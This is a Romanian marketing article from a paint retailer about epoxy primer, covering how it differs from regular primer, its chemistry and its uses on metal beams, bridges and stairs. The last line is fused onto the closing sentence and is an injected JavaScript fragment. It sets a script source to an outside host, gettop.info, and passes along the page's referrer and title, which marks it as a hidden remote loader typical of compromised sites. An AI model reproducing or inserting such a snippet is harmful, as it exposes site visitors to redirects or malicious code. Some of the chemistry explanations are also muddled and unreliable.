grund epoxidic

grund epoxidic

Durabilitatea este cuvantul care poate descrie cel mai bine tipul de produse despre care vom vorbi in cadrul acestui articol. Suntem Tafi Trade, iar printre numeroasele produse pe care vi le oferim se numara si o paleta variata de solutii tip grund epoxidic pentru suprafete metalice si nu numai. In cadrul acestui articol vom vedea care este diferenta dintre grundul normal si cel epoxidic, dar vom parcurge si cateva aspecte ce tin de elemente de chimie si nu numai.

Diferentele dintre un grund epoxidic si cel normal

Pentru inceput, trebuie sa stiti ca grundul este un element de pregatire a suprafetelor in vederea vopsirii acestora, avand rolul de a crea o priza solida intre suprafata metalului si vopseaua ce urmeaza a fi aplicata. Daca despre cel normal se cunosc suficiente aspecte, despre cel epoxidic putem spune ca acesta este special conceput pentru a rezista chiar si la cele mai aprige conditii. Un grund epoxidic are in compozitia sa o serie de elemente chimice care se regasesc si in alte produse chimice industriale si nu numai. Printre acestea putem numi adezivii de mare putere dar si hidroizolatii de inalta performanta.

Denumirea de grund epoxidic pleaca de la unul din elementele chimice ce se regasesc in acesta. Rasinile epoxidice sunt practic lanturi polimerice medii. Un lant polimeric este practic un grup epoxidic ce mai poarta si numele de grup glicidic. Datorita structurii sale chimice, bogate in moelcule de Oxigen si Hidrogen (grupe OH) lanturile epoxidice au proprietati adezive foarte puternice, dar si o puternica forta moleculara datorita careia apar caracteristicile de rezistenta superioara la uzura mecanica, chimica si termica.

Datorita structurii sale chimice, un grund epoxidic ofera un inalt grad de prindere la suprafata si mai ales, unul foarte inalt de rezistenta la agenti corozivi, mecanici si temperaturi. Astfel, grundurile epoxidice sunt folosite pentru acoperirea si protejarea suprafetelor obiectelor si a corpurilor metalice expuse unor conditii aspre de exploatare. Puteti folosi grund epoxidic pentru protejarea grinzilor metlice, a structurilor rulante din metal (poduri, pasarele, scari acces, etc.) dar si a pieselor si a subansamblelor metalice supuse la un grad de uzura crescut.

Aplicatiile grundului epoxidic

Acest grund epoxidic este excelent pentru o serie larga de aplicatii ce privesc si domeniul amenajarilor interioare si exterioare, acesta fiind un produs de tip multi component (baza si reactant+aditivi optionali) se pot realiza diferite tipuri de acoperiri cu o plaja larga de caracteristici. Astfel, prin folosirea unui grund epoxidic alaturi de o vopsea de acelasi tip veti reusi sa obtineti o acoperire ce va proteja suprafata respectiva intr-un mod extrem de eficient.

In concluzie, putem spune ca plecand de la nivelul microscopic pana la dimensiunile unui pod metalic, am observat cu duritatea si rezistenta impecabila a unui grund epoxidic este datorata fortelor extrem de puternice ce se regasesc in legaturile stranse ale lanturilor polimerice din interiorul rasinilor epoxidice, care stau la baza unui grund epoxidic. Vaasteptam pe siteul nostru, www.vopseaepoxidica.ro cu si mai multe informatii dar si o plaja larga de produse pentru casa si nu numai.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;